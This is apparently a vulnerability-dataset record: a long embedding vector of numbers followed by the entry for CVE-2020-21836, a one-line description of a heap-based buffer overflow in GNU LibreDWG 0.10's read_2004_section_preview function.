0.006108593661338091, 0.0016669717151671648, -0.008103802800178528, -0.026861945167183876, 0.008321966975927353, 0.008694829419255257, -0.010701938532292843, -0.0012802262790501118, -0.019626831635832787, 0.009916547685861588, 0.009535752236843109, 0.0027111840900033712, 0.006893984042108059, -0.017881520092487335, 0.011296931654214859, 0.00003334439315949567, 0.0009911590022966266, 0.005196270998567343, 0.0132167749106884, -0.00011707724479492754, 0.0013089843560010195, 0.01297084428369999, 0.014263962395489216, -0.019150838255882263, -0.012629715725779533, -0.0005612766253761947, -0.009139090776443481, -0.015247683972120285, 0.011082733981311321, -0.014129097573459148, 0.00806413684040308, -0.003762338310480118, -0.03033670410513878, 0.023688649758696556, -0.005549299996346235, 0.021800538524985313, 0.0076436749659478664, -0.03754008561372757, -0.023403052240610123, -0.01067020557820797, -0.028448592871427536, 0.019436433911323547, -0.024021845310926437, -0.01994416117668152, -0.0063822902739048, 0.002727050567045808, 0.002548552816733718, -0.016453536227345467, -0.012248920276761055, -0.012010922655463219, -0.013676903210580349, -0.007901505567133427, -0.0008994308882392943, -0.003817870980128646, 0.018801774829626083, -0.007707140874117613, 0.009694417007267475, 0.003960669040679932, -0.015620546415448189, 0.0037742380518466234, 0.012280653230845928, 0.029543379321694374, 0.0004345927154645324, -0.018611377105116844, -0.025148365646600723, -0.00010201648547081277, -0.019277768209576607, -0.004752009641379118, -0.0031951116397976875, 0.0012008938938379288, -0.0068344846367836, 0.02080095000565052, -0.009535752236843109, -0.0017482873518019915, -0.03316093608736992, 0.00011397831985959783, 0.002897615311667323, -0.002264939481392503, 0.009916547685861588, 0.006826551631093025, -0.011082733981311321, -0.0033775761257857084, -0.02167360670864582, 0.008639296516776085, 0.004997940268367529, -0.0032605610322207212, 0.02695714309811592, 0.015231817960739136, 0.013795901089906693, -0.0016877964371815324, 0.012280653230845928, -0.010924069210886955, 0.0011185866314917803, -0.001203868887387216, -0.00524783693253994, 0.009361221455037594, -0.02135627716779709, -0.004105451051145792, 0.001455749268643558, -0.023545851930975914, 0.004763909615576267, 0.010503607802093029, -0.004343448206782341, -0.005235937424004078, 0.003214944852516055, 0.0015033486997708678, 0.02924191579222679, 0.006985216401517391, 0.023577583953738213, 0.004422780591994524, -0.010995468124747276, 0.00016610218153800815, -0.007695241365581751, -0.003974552266299725, 0.015303216874599457, 0.01340717263519764, -0.001917860354296863, -0.009940347634255886, 0.006544921547174454, -0.01640593633055687, 0.011003401130437851, -0.009273955598473549, 0.013462705537676811, 0.02064228616654873, 0.01743725873529911, 0.004256182350218296, 0.006302957888692617, 0.006310890894383192, 0.007028849329799414, -0.019246036186814308, 0.001363525283522904, -0.01994416117668152, -0.018754174932837486, -0.010638472624123096, 0.012447251006960869, 0.004771843086928129, 0.005938028916716576, -0.008488564752042294, -0.0006510213715955615, -0.0041808164678514, -0.020229756832122803, -0.018722442910075188, 0.0022609729785472155, 0.015120752155780792, -0.015652278438210487, 0.01117793284356594, 0.007651608437299728, 0.02153080888092518, -0.008083970285952091, -0.007219247054308653, -0.037000622600317, -0.010924069210886955, 0.013502371497452259, -0.003020580392330885, 0.008694829419255257, 0.015247683972120285, -0.004208582919090986, -0.0010571039747446775, 0.008123636245727539, -0.024577172473073006, 0.0015380565309897065, 0.004232382867485285, 0.010598806664347649, 0.00036889559123665094, -0.007604009006172419, 0.02752833627164364, 0.00262391846626997, 0.008702762424945831, -0.004430713597685099, 0.005834896583110094, 0.015612613409757614, 0.007774573750793934, -0.0247041042894125, 0.005850763060152531, -0.013922832906246185, -0.010781270451843739, 0.01091613620519638, -0.009654751047492027, -0.042046163231134415, 0.0071478476747870445, 0.007726974319666624, -0.02641768380999565, -0.015049353241920471, -0.027750467881560326, 0.002697301097214222, 0.020721618086099625, 0.01865897700190544, 0.03366866335272789, -0.0002791508159134537, -0.000026960615286952816, 0.011749126017093658, 0.00925015565007925, -0.018230581656098366, -0.0018643110524863005, -0.012288586236536503, 0.03335133567452431, 0.008282301016151905, 0.009051824919879436, 0.0014289745595306158, -0.006334690842777491, -0.0035818570759147406, 0.001601522439159453, -0.0031673454213887453, -0.025069033727049828, 0.0034826917108148336, -0.014954154379665852, 0.014414694160223007, -0.010329076088964939, 0.010456007905304432, 0.016834331676363945, -0.015231817960739136, -0.0037762215360999107, -0.016072740778326988, -0.00023179930576588959, -0.02611622028052807, 0.0065925209783017635, 0.024799302220344543, 0.006826551631093025, 0.019817229360342026, 0.016064807772636414, -0.01093200221657753, 0.012621781788766384, -0.0176435224711895, -0.018214715644717216, -0.01163012720644474, 0.015096952207386494, 0.0008230734965763986, 0.03608036786317825, -0.017833920195698738, -0.005914228968322277, -0.009131157770752907, 0.02413291111588478, -0.01748485676944256, 0.0010109920985996723, -0.001432941178791225, 0.02590995654463768, -0.0046290447935462, -0.0066916863434016705, 0.010106945410370827, 0.015580880455672741, -0.006985216401517391, -0.006080827210098505, -0.002356171840801835, 0.009599218145012856, -0.03687369078397751, 0.00419271644204855, 0.00819503515958786, -0.001665980089455843, -0.006211725529283285, 0.004597311839461327, 0.0014825238613411784, -0.007695241365581751, 0.011590461246669292, -0.0033775761257857084, -0.02222893387079239, -0.007881672121584415, -0.023133322596549988, -0.013502371497452259, -0.0025743357837200165, 0.03404945880174637, 0.027909131720662117, 0.010035546496510506, 0.010844736360013485, 0.0009485178161412477, 0.0026100354734808207, 0.004732176661491394, -0.0030126471538096666, -0.03154255449771881, -0.0001659782137721777, 0.004736143164336681, 0.0032565942965447903, -0.0007690282654948533, 0.018563777208328247, 0.028972186148166656, -0.006068927235901356, 0.005941995419561863, 0.009821348823606968, -0.004835308529436588, -0.0016838298179209232, 0.007179580628871918, -0.017342058941721916, -0.004680610727518797, -0.018563777208328247, 0.014097364619374275, -0.009051824919879436, -0.0022133735474199057, 0.0005523517029359937, 0.012042655609548092, -0.012820113450288773, -0.010083145461976528, -0.0024474039673805237, -0.00035352492704987526, -0.012931178323924541, -0.002945214742794633, 0.031066561117768288, -0.007611942011862993, 0.00061135517898947, 0.014533692970871925, -0.0006292049656622112, 0.0220544021576643, -0.014002165757119656, -0.004236349370330572, -0.013304040767252445, 0.004482279531657696, 0.0029809141997247934, -0.004668710753321648, 0.0185003113001585, -0.014620957896113396, 0.015438081696629524, 0.013772102072834969, -0.007877705618739128, 0.02341892011463642, -0.014858955517411232, -0.017008863389492035, -0.008377499878406525, 0.012153721414506435, 0.0017710954416543245, 0.022022670134902, -0.01691366359591484, -0.006687719840556383, 0.00560086639598012, 0.004414847120642662, 0.009504019282758236, -0.01410529762506485, -0.008409232832491398, -0.0050257062539458275, 0.0067591192200779915, 0.011645994149148464, 0.014406761154532433, 0.009884814731776714, 0.0015896225813776255, -0.0073937783017754555, -0.022466931492090225, -0.031986817717552185, 0.00639419024810195, 0.023561717942357063, 0.01992829516530037, -0.0031772619113326073, -0.024942101910710335, -0.010352876037359238, -0.026719147339463234, -0.001601522439159453, -0.00997208058834076, -0.00196843477897346, -0.007096281740814447, -0.013621370308101177, 0.014390894211828709, -0.007592109031975269, 0.039729658514261246, 0.04023738577961922, -0.010289410129189491, -0.012042655609548092, -0.0008022487163543701, 0.004022151697427034, 0.0008954642689786851, 0.02237173169851303, -0.010606739670038223, 0.00009650040738051757, 0.027972597628831863, -0.002945214742794633, 0.016421804204583168, 0.00182960310485214, -0.003655239474028349, 0.00036839974927715957, 0.016310738399624825, 0.009266022592782974, 0.027385538443922997, 0.0007214288343675435, -0.0027012676000595093, 0.014382961206138134, 0.0029789309483021498, -0.01278044655919075, -0.012748713605105877, -0.03120935894548893, 0.013803835026919842, 0.02134041115641594, 0.00917875673621893, 0.011312797665596008, 0.004125284031033516, -0.0025128531269729137, -0.02094374969601631, 0.017151661217212677, -0.003667139448225498, -0.0012058522552251816, 0.00016573030734434724, -0.006981249898672104, 0.0015707812272012234, 0.013272307813167572, 0.038365140557289124, -0.0317964181303978, 0.0055017005652189255, -0.007691274397075176, -0.008242635056376457, -0.019087372347712517, 0.011788791976869106, -0.004791676066815853, 0.0019267852185294032, -0.009321555495262146, -0.01189985778182745, -0.021276945248246193, -0.020864415913820267, 0.0019446350634098053, -0.007477077189832926, 0.0021261079236865044, -0.013891099952161312, 0.020832683891057968, 0.005097105633467436, -0.002935298252850771, -0.008155369199812412, -0.03328786790370941, -0.007929272018373013, 0.0009966130601242185, -0.0000593443401157856, 0.03281187266111374, -0.01991242729127407, 0.004430713597685099, -0.008964559063315392, 0.01972202956676483, 0.00244542071595788, 0.0021479243878275156, -0.0005235937424004078, -0.005216103978455067, -0.01919843629002571, 0.012494849972426891, -0.0008815811015665531, -0.01269318163394928, -0.013430972583591938, 0.020007627084851265, -0.008671029470860958, -0.010273543186485767, 0.018087783828377724, -0.004839275497943163, -0.013034310191869736, 0.005128838587552309, 0.007215280085802078, -0.007346178870648146, -0.03047950193285942, -0.022657329216599464, -0.0038198542315512896, -0.008909027092158794, -0.011915723793208599, -0.018056049942970276, 0.006644086912274361, 0.01393869984894991, -0.01708819530904293, -0.010440141893923283, -0.008996292017400265, 0.008048269897699356, 0.010075212456285954, 0.016818465664982796, -0.0009366179583594203, 0.017500724643468857, -0.000826048431918025, 0.009416754357516766, -0.028432726860046387, -0.0039091031067073345, -0.01384350098669529, -0.008861427195370197, 0.002108258195221424, 0.0005964803858660161, -0.028162995353341103, 0.006017361301928759, 0.02343478612601757, -0.00019374454859644175, -0.007250980008393526, 0.015263550914824009, -0.008655163459479809, -0.024069445207715034, -0.009511953219771385, 0.01040840893983841, 0.00011633350368356332, -0.01136833056807518, 0.007124048192054033, -0.006132393144071102, -0.008940760046243668, -0.010011746548116207, 0.002231223275884986, 0.0068384516052901745, -0.028861120343208313, -0.02592582255601883, -0.013034310191869736, -0.006652020383626223, -0.03070163168013096, 0.01780218631029129, -0.006893984042108059, 0.018817640841007233, 0.005751597695052624, -0.00012104386405553669, 0.010114878416061401, -0.003363693132996559, 0.0069971163757145405, 0.004517979454249144, 0.011812591925263405, 0.0017205210169777274, 0.014795489609241486, 0.0026814346201717854, -0.010884403251111507, -0.00897249300032854, 0.017738720402121544, -0.012772513553500175, -0.011796724982559681, -0.01138419657945633, -0.005315269809216261, 0.01923017017543316, -0.0039011698681861162, 0.001983309630304575, 0.0021578408777713776, -0.016659799963235855, -0.018008451908826828, 0.0025326863396912813, -0.005446168128401041, 0.018754174932837486, 0.010511540807783604, -0.013661036267876625, 0.002538636326789856, -0.02695714309811592, -0.028115397319197655, 0.0037226721178740263, 0.0136689692735672, 0.023053990676999092, -0.006529055070132017, -0.013462705537676811, -0.011304864659905434, -0.013208841904997826, 0.03192334994673729, 0.004264115821570158, 0.008155369199812412, -0.027433138340711594, -0.004609211347997189, 0.0007179580861702561, -0.006913817021995783, -0.0014349244302138686, -0.010844736360013485, 0.014946221373975277, -0.008480631746351719, -0.0037167221307754517, 0.00932948850095272, 0.024640638381242752, -0.007096281740814447, 0.012217187322676182, 0.006628220435231924, 0.0009604176739230752, -0.004803575575351715, 0.03082856349647045, 0.018420979380607605, -0.015327016822993755, 0.01559674646705389, 0.012883579358458519, -0.0074056778103113174, -0.007477077189832926, 0.0042204828932881355, -0.00475994311273098, 0.0001659782137721777, -0.00023229513317346573, -0.007730940822511911, -0.003205028362572193, 0.008393365889787674, 0.002731017302721739, 0.024228109046816826, -0.008504431694746017, 0.01639007031917572, -0.0013288174523040652, 0.011542861349880695, 0.012137854471802711, -0.007120081223547459, 0.004339481238275766, -0.00524783693253994, 0.006644086912274361, 0.00013771606609225273, 0.005132805090397596, -0.011431796476244926, -0.0021459409035742283, -0.009059757925570011, 0.0022708894684910774, -0.028972186148166656, -0.006667886860668659, -0.03290707245469093, 0.028305795043706894, 0.00031137961195781827, -0.013026377186179161, -0.015176285058259964, -0.00480754254385829, 0.0009217431070283055, 0.009837215766310692, -0.03122522681951523, 0.0018583610653877258, -0.02554502710700035, 0.0005930095794610679, 0.03325613588094711, -0.00917875673621893, -0.0009743008413352072, -0.004593344870954752, -0.008782095275819302, 0.0019505849340930581, 0.008916960097849369, -0.003155445447191596, -0.002828199416399002, 0.01297084428369999, 0.0005419393419288099, -0.040618181228637695, -0.002965047722682357, -0.010511540807783604, -0.023561717942357063, 0.01888110674917698, 0.018801774829626083, -0.04141150414943695, 0.0048472085036337376, -0.006632187403738499, -0.007163714151829481, 0.007369978353381157, -0.015406348742544651, -0.02029322274029255, -0.01012281235307455, 0.028289927169680595, 0.004184783436357975, 0.003734571859240532, 0.006148259621113539, 0.025671958923339844, 0.0035540908575057983, -0.021927470341324806, -0.02011869288980961, 0.001217752113007009, 0.0030780965462327003, -0.009186689741909504, -0.00001496778986620484, 0.00013238591782283038, 0.007687307894229889, -0.009551619179546833, 0.022181333974003792, 0.00299678067676723, 0.02805193141102791, 0.014985887333750725, 0.000938105455134064, -0.016342470422387123, 0.0035441741347312927, -0.007389811333268881, -0.004819442052394152, 0.008409232832491398, -0.012050588615238667, 0.0004452530120033771, 0.003673089435324073, 0.003907119855284691, -0.024228109046816826, 0.012415518052875996, 0.018944572657346725, 0.0003674080944620073, -0.00419271644204855, 0.004291881807148457, 0.016612201929092407, 0.01692953146994114, -0.014137030579149723, -0.010860603302717209, 0.009805482812225819, 0.039920054376125336, 0.021070681512355804, -0.006747219245880842, -0.02184813842177391, 0.002524753101170063, 0.0032367613166570663, -0.02135627716779709, 0.01727859303355217, 0.007116114720702171, 0.009170823730528355, 0.009813415817916393, -0.003365676384419203, 0.022451063618063927, 0.0032189113553613424, -0.007861839607357979, 0.02011869288980961, -0.0056603653356432915, 0.02078508399426937, 0.00783803965896368, 0.006596487481147051, -0.008440965786576271, 0.01030527614057064, -0.028067797422409058, -0.013605503365397453, -0.002346255350857973, -0.01374830212444067, -0.013240574859082699, -0.011376263573765755, -0.0001694490056252107, -0.016834331676363945, 0.008750362321734428, 0.022879458963871002, 0.007548476103693247, -0.012272719293832779, 0.0031713119242340326, 0.015461881645023823, 0.009853081777691841, -0.011082733981311321, 0.007151814177632332, 0.006104626692831516, 0.01815124973654747, 0.012240986339747906, -0.0007239080150611699, 0.0030225638765841722, 0.011471462436020374, -0.018278181552886963, -0.006100660189986229, 0.021245211362838745, 0.012851846404373646, -0.0031078460160642862, -0.0015519397566094995, 0.005382702220231295, 0.002808366436511278, 0.0022510564886033535, -0.0009628967964090407, -0.02782979980111122, -0.00004908691335003823, 0.01119379885494709, 0.004347414709627628, 0.002838115906342864, -0.010392541997134686, 0.00011069346510339528, -0.013470638543367386, -0.004680610727518797, 0.0059578618966042995, -0.009940347634255886, -0.016294872388243675, 0.006306924391537905, -0.009400887414813042, -0.0007472118595615029, 0.004541778936982155, -0.01347857154905796, 0.014851022511720657, 0.019706163555383682, 0.008956626057624817, -0.01110653392970562, 0.001562847988680005, 0.010146611370146275, 0.014494026079773903, -0.002300639171153307, -0.003803987754508853, 0.0032089948654174805, -0.002179657341912389, 0.018436845391988754, 0.0006614337326027453, -0.0014696323778480291, -0.004172883462160826, 0.003978519234806299, 0.0059776948764920235, -0.02081681787967682, -0.00906769186258316, 0.028274061158299446, 0.0020666085183620453, 0.029305381700396538, 0.0011919690296053886, 0.009868948720395565, -0.014025965705513954, 0.012772513553500175, 0.000021258600099827163, -0.024101177230477333, -0.002421621000394225, -0.0009267014102078974, -0.006517155095934868, -0.002707217587158084, -0.015358749777078629, -0.013875233940780163, 0.016048941761255264, -0.00558896642178297, -0.013716569170355797, 0.026163820177316666, -0.007639708463102579, 0.01119379885494709, 0.0033815428614616394, 0.006279157940298319, 0.011066867038607597, -0.02186400443315506, -0.00466474425047636, 0.0034172423183918, -0.005628632381558418, 0.004204616416245699, 0.027274472638964653, -0.018389247357845306, 0.00787373911589384, -0.007128014694899321, 0.021721206605434418, -0.01543014869093895, 0.01569194532930851, 0.021102413535118103, -0.01694539748132229, -0.020404288545250893, -0.03174882009625435, 0.004724243655800819, 0.005584999918937683, 0.013621370308101177, 0.023863181471824646, 0.0058190301060676575, 0.005596899427473545, 0.01401009876281023, 0.00018296031339559704, 0.015382548794150352, 0.00039889314211905, 0.011693593114614487, -0.008012570440769196, -0.004149083513766527, -0.00029476938652805984, 0.0034569085109978914, -0.03560437262058258, -0.002566402545198798, -0.013169175945222378, 0.013454772531986237, -0.000718453899025917, 0.020769217982888222, -0.006493355613201857, -0.015874410048127174, -0.01021801121532917, -0.0018117532599717379, 0.013930766843259335, 0.004363281186670065, 0.03433505445718765, -0.0032268445938825607, 0.008448898792266846, -0.007818206213414669, -0.0059657953679561615, 0.012574182823300362, -0.0010432208655402064, -0.0052637034095823765, -0.015485681593418121, -0.0036096235271543264, 0.01480342261493206, 0.015001753345131874, -0.002990830922499299, 0.020864415913820267, 0.005620699375867844, -0.019103238359093666, -0.004942407365888357, -0.016294872388243675, -0.0039884354919195175, -0.0007958029746077955, -0.013462705537676811, -0.012915312312543392, 0.0064417896792292595, -0.03262147679924965, 0.018040183931589127, -0.003700855653733015, -0.012891512364149094, 0.007572276052087545, -0.0006976291188038886, 0.00520023750141263, 0.014930354431271553, 0.009861014783382416, 0.0034331087954342365, 0.01818298175930977, -0.003803987754508853, -0.012796313501894474, 0.021610140800476074, 0.012939111329615116, -0.00044500507647171617, 0.01865897700190544, -0.006695653311908245, 0.00103627925273031, -0.004993973299860954, 0.013359573669731617, -0.00042318867053836584, -0.0013367506908252835, -0.0068503511138260365, -0.003930919803678989, 0.0014061664696782827, 0.0021459409035742283, 0.010265610180795193, -0.001199902268126607, 0.01163012720644474, 0.007845972664654255, -0.0036195400170981884, -0.0054898010566830635, 0.007338245399296284, -0.025084899738430977, -0.0032883272506296635, -0.01182052493095398, -0.010797137394547462, 0.00898835901170969, -0.021641874685883522, -0.018071917816996574, -0.013700702227652073, -0.002459303941577673, 0.01635833829641342, 0.0056405323557555676, -0.015215951018035412, -0.00475994311273098, -0.021372143179178238, -0.014930354431271553, -0.0022272567730396986, 0.004490213003009558, -0.00787373911589384, 0.007921338081359863, -0.0057277982123196125, 0.00524783693253994, 0.00014825239486526698, 0.0004298823478166014, -0.0029888474382460117, -0.00372465536929667, 0.013899033889174461, -0.0035858238115906715, 0.01710406132042408, 0.00594596192240715, 0.004216516390442848, 0.012828046455979347, -0.022181333974003792, -0.005430301651358604, 0.018262315541505814, -0.022165467962622643, -0.015112819150090218, -0.004188749939203262, -0.02026149071753025, 0.005644498858600855, -0.0042403158731758595, 0.034271590411663055, -0.019674431532621384, -0.020880283787846565, 0.008663096465170383, 0.029003920033574104, 0.010868536308407784, 0.0015747478464618325, 0.00932948850095272, -0.003934886306524277, 0.00961508508771658, 0.015771277248859406, -0.008813828229904175, 0.014962087385356426, 0.013042244128882885, -0.01199505664408207, -0.0027191173285245895, 0.01393869984894991, -0.0018226614920422435, 0.01619967259466648, -0.007203380577266216, 0.010360809043049812, -0.0020408255513757467, -0.004763909615576267, 0.002893648575991392, 0.010329076088964939, 0.011780858971178532, -0.002407737774774432, 0.010947869159281254, 0.013922832906246185, 0.009266022592782974, -0.010789204388856888, 0.02571955882012844, 0.004878941457718611, 0.01621553860604763, 0.011376263573765755, -0.008901093155145645, 0.004779776092618704, 0.004787709563970566, 0.006406089756637812, -0.011352463625371456, 0.015279416926205158, 0.0013427005615085363, -0.010860603302717209, -0.00213800766505301, -0.004835308529436588, -0.019182570278644562, 0.010519473813474178, 0.003280394012108445, 0.007742840796709061, 0.013367506675422192, 0.015652278438210487, 0.001105695147998631, 0.001483515603467822, -0.006402123253792524, -0.006632187403738499, 0.0023502218537032604, -0.01618380658328533, -0.01867484301328659, -0.032177213579416275, 0.0000407198240282014, 0.003520374419167638, -0.006318824365735054, -0.006640120409429073, 0.0025049198884516954, -0.008520297706127167, -0.01040840893983841, -0.005228003952652216, -0.0007789448136463761, 0.016977129504084587, 0.014311562292277813, 0.010376675985753536, 0.010709871537983418, 0.01170946005731821, -0.022181333974003792, 0.017865652218461037, -0.01794498600065708, 0.026322484016418457, 0.0030047139152884483, -0.01497795432806015, -0.0048670414835214615, 0.01745312474668026, -0.0013873249990865588, -0.0038000212516635656, -0.00007654335058759898, 0.002132057910785079, 0.01250278390944004, 0.009408820420503616, 0.009511953219771385, -0.0009435595129616559, 0.006727386265993118, -0.0066916863434016705, 0.010178344324231148, 0.00047450681449845433, -0.005711931735277176, -0.0037087888922542334, 0.014454360119998455, 0.01216165442019701, 0.013811768032610416, 0.011764992028474808, 0.01748485676944256, -0.005446168128401041, 0.011471462436020374, 0.0064338562078773975, 0.005632599350064993, -0.010003813542425632, 0.009575419127941132, -0.006497322116047144, 0.014573358930647373, 0.0036135900299996138, 0.029717911034822464, -0.013811768032610416, -0.017183395102620125, 0.009987946599721909, 0.0118919238448143, -0.01778632029891014, -0.004359314683824778, 0.0012494850670918822, -0.00040657847421243787, 0.006338657345622778, -0.0051050386391580105, 0.008119669742882252, -0.006235525477677584, -0.00908355787396431, -0.008797961287200451, 0.005485834088176489, 0.009107357822358608, 0.0014031914761289954, -0.001143377972766757, 0.028623124584555626, 0.04191923141479492, -0.003076113061979413, -0.002538636326789856, -0.01199505664408207, -0.0019277769606560469, -0.01658046804368496, -0.003076113061979413, -0.026576347649097443, -0.0016977130435407162, -0.001008017105050385, 0.01216165442019701, -0.004648877773433924, 0.0030840463005006313, 0.006576654501259327, -0.0006311882752925158, 0.005275603383779526, 0.003280394012108445, 0.0023879047948867083, 0.004085617605596781, 0.01576334424316883, 0.0057991971261799335, 0.003355759894475341, 0.006901917513459921, -0.007183547131717205, -0.0022788227070122957, 0.004502112977206707, 0.03408119082450867, 0.01724686101078987, 0.020547086372971535, 0.01312157604843378, -0.0006981249898672104, 0.007647641934454441, -0.000681266828905791, -0.00727081298828125, -0.007707140874117613, 0.01516835205256939, 0.003048346843570471, 0.0202456247061491, 0.03506491333246231, -0.006318824365735054, -0.0012822096468880773, 0.013819701038300991, 0.0015430148923769593, -0.010694005526602268, -0.0008969517657533288, 0.0036294565070420504, -0.01794498600065708, 0.002058675279840827, -0.0060570272617042065, 0.004930507391691208, 0.0030086806509643793, -0.0032169281039386988, -0.007750773802399635, -0.0404912494122982, 0.009369154460728168, 0.04341068118810654, -0.004902741406112909, 0.015810944139957428, -0.012843912467360497, -0.002114207949489355, -0.02503729984164238, -0.018722442910075188, 0.022482797503471375, -0.01552534755319357, 0.01348650548607111, 0.016643933951854706, -0.01567607931792736, 0.005358902271836996, -0.00317329540848732, -0.003978519234806299, -0.014033898711204529, 0.023053990676999092, 0.02435504086315632, -0.027591802179813385, -0.014248096384108067, 0.016453536227345467, -0.03912673145532608, 0.0019495933083817363, 0.016310738399624825, 0.00796893797814846, 0.004791676066815853, -0.006013394799083471, -0.020340822637081146, 0.0009143057395704091, 0.010368742048740387, 0.0007943154778331518, 0.018246447667479515, -0.006370390299707651, -0.007377911824733019, -0.010884403251111507, -0.022990524768829346, -0.017754588276147842, -0.0034787249751389027, 0.013494438491761684, 0.016239339485764503, -0.02714754082262516, -0.0013456755550578237, 0.01040047500282526, -0.00829023402184248, 0.015485681593418121, -0.006687719840556383, -0.013058110140264034, 0.006683753337711096, -0.03582650423049927, 0.0077230073511600494, 0.010170411318540573, 0.008599630557000637, -0.018278181552886963, 0.01155872829258442, -0.007719040848314762, 0.019134970381855965, -0.006826551631093025, 0.006640120409429073, -0.004204616416245699, -0.010273543186485767, 0.012478983961045742, 0.015985475853085518, -0.0021439576521515846, 0.01834164746105671, 0.021086547523736954, 0.017754588276147842, -0.016239339485764503, -0.009416754357516766, 0.010900269262492657, -0.002627885201945901, 0.0158664770424366, -0.028623124584555626, -0.0030979295261204243, -0.0033815428614616394, 0.0013079926138743758, 0.002096358221024275, -0.008115703240036964, 0.0065131885930895805, -0.01710406132042408, 0.010329076088964939, 0.007274779491126537, -0.012828046455979347, 0.020848549902439117, -0.008250568062067032, 0.013954565860331059, 0.015929942950606346, -0.012137854471802711, 0.007536576595157385, -0.009987946599721909, 0.006326757371425629, -0.020578820258378983, -0.01694539748132229, -0.02397424541413784, -0.00233237212523818, 0.007937205024063587, 0.016088606789708138, -0.02449784055352211, -0.00007685324817430228, -0.009480220265686512, -0.021768806502223015, 0.0068384516052901745, 0.009662684053182602, 0.018056049942970276, 0.010543273761868477, -0.01455749198794365, 0.00560086639598012, 0.014343295246362686, 0.015208018012344837, 0.01455749198794365, -0.019801363348960876, 0.00951988622546196, -0.016977129504084587, -0.01835751347243786, 0.008829694241285324, 0.01076540444046259, -0.013875233940780163, -0.007203380577266216, -0.027750467881560326, -0.013502371497452259, -0.013208841904997826, 0.023403052240610123, 0.011344530619680882, 0.0033914593514055014, -0.011320730671286583, -0.005985628347843885, -0.012240986339747906, 0.01331197377294302, 0.009591285139322281, 0.005224037449806929, 0.006921750493347645, 0.006509222090244293, 0.003746471833437681, -0.015565013512969017, -0.009575419127941132, 0.060705140233039856, 0.012225120328366756, 0.015295283868908882, 0.016691533848643303, -0.0024950033985078335, 0.005466001108288765, -0.012121988460421562, -0.015215951018035412, -0.007409644778817892, 0.039031531661748886, 0.011661860160529613, -0.0020566920284181833, 0.005279569886624813, 0.0001642428251216188, 0.0004702922888100147, 0.0009807465830817819, -0.009028024971485138, -0.02170534059405327, -0.013208841904997826, -0.021181745454669, -0.009432620368897915, 0.01455749198794365, 0.015612613409757614, -0.014597158879041672, 0.0025545028038322926, 0.013875233940780163, -0.009694417007267475, -0.00040112435817718506, 0.010249744169414043, 0.0012812180211767554, 0.02729034051299095, -0.009908614680171013, -0.006489389110356569, 0.017691122367978096, -0.0011017285287380219, 0.01865897700190544, 0.023879047483205795, 0.0193729680031538, -0.006767052225768566, -0.010257677175104618, 0.021546674892306328, 0.01102720107883215, -0.014620957896113396, 0.000501529430039227, -0.000667383661493659, 0.003970585763454437, 0.00916289072483778, -0.006461622659116983, -0.0027131675742566586, 0.011011335067451, 0.01675499975681305, -0.0002580781583674252, 0.0030741298105567694, -0.0036988724023103714, 0.005208170972764492, -0.021213479340076447, -0.007810273207724094, -0.013185041956603527, 0.00017403542005922645, -0.021261079236865044, -0.00002914535434683785, -0.008758295327425003, -0.02165774069726467, -0.018801774829626083, -0.0246565043926239, -0.0009673592285253108, -0.00109280354809016, 0.019103238359093666, 0.0005587975028902292, 0.006306924391537905, -0.0041609834879636765, -0.0009480220032855868, -0.003038430353626609, -0.0077230073511600494, -0.018119515851140022, -0.011598394252359867, -0.0032962604891508818, 0.002455337205901742, -0.0017790286801755428, -0.008401299826800823, 0.0014864904806017876, -0.013780035078525543, -0.0073144459165632725, -0.0006946541834622622, 0.0005449143354780972, -0.004894807934761047, -0.003839687444269657, -0.0002771675062831491, -0.013700702227652073, 0.028972186148166656, 0.0062751914374530315, -0.005723831243813038, -0.009496086277067661, -0.01250278390944004, 0.010646405629813671, -0.007536576595157385, 0.00916289072483778, 0.0001313942630076781, -0.011217598803341389, 0.006806718651205301, 0.013613437302410603, 0.009821348823606968, -0.012661448679864407, -0.013248507864773273, 0.0034707917366176844, -0.011035134084522724, 0.004355347715318203, -0.0158664770424366, -0.007742840796709061, -0.003970585763454437, 0.006211725529283285, 0.006517155095934868, -0.023133322596549988, 0.0003146024828311056, 0.021546674892306328, 0.010027613490819931, -0.007901505567133427, 0.0024672371800988913, 0.019515765830874443, -0.0031336292158812284, -0.010622605681419373, -0.006104626692831516, 0.02941644750535488, 0.01023387722671032, 0.010987535119056702, -0.012153721414506435, 0.006310890894383192, 0.009234289638698101, 0.012471050955355167, 0.02184813842177391, -0.001852411194704473, -0.007429477758705616, 0.0073858448304235935, 0.0074731106869876385, -0.00003703211041283794, 0.027274472638964653, 0.0016372220125049353, 0.007679374888539314, 0.0054104686714708805, 0.0051923044957220554, -0.008258501067757607, 0.06898744404315948, -0.0045576454140245914, 0.0034648417495191097, -0.030638165771961212, 0.004402947146445513, 0.013494438491761684, 0.0008919934625737369, -0.003734571859240532, -0.02570369280874729, 0.01576334424316883, 0.012899445369839668, -0.003038430353626609, 0.01853204518556595, 0.0012137854937463999, -0.004621111322194338, 0.028464458882808685, 0.01691366359591484, -0.008710695430636406, 0.004089584574103355, 0.005077272653579712, 0.010178344324231148, -0.007302545942366123, 0.0028678656090050936, 0.021086547523736954, 0.016977129504084587, 0.003986452240496874, -0.02273666113615036, 0.018912840634584427, -0.015295283868908882, -0.01574747823178768, 0.00244542071595788, 0.007730940822511911, -0.002344271866604686, 0.01708819530904293, 0.01525561697781086, 0.007262879516929388, 0.003569957334548235, 0.012193387374281883, 0.01654873602092266, 0.014192563481628895, -0.00293133151717484, -0.005834896583110094, 0.010551206767559052, 0.04563198611140251, -0.01119379885494709, -0.007957038469612598, -0.0073263454250991344, 0.012843912467360497, -0.009940347634255886, -0.01818298175930977, -0.01973789744079113, 0.020721618086099625, -0.01654873602092266, -0.009186689741909504, 0.02573542483150959, 0.02802019752562046, -0.01384350098669529, 0.03776221349835396, 0.007239080034196377, 0.009186689741909504, -0.03157429024577141, -0.03360519930720329, 0.005696065258234739 ]
2,037
CVE-2020-21836
2021-05-17T21:15:07.463000
A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10 via read_2004_section_preview ../../src/decode.c:3175.
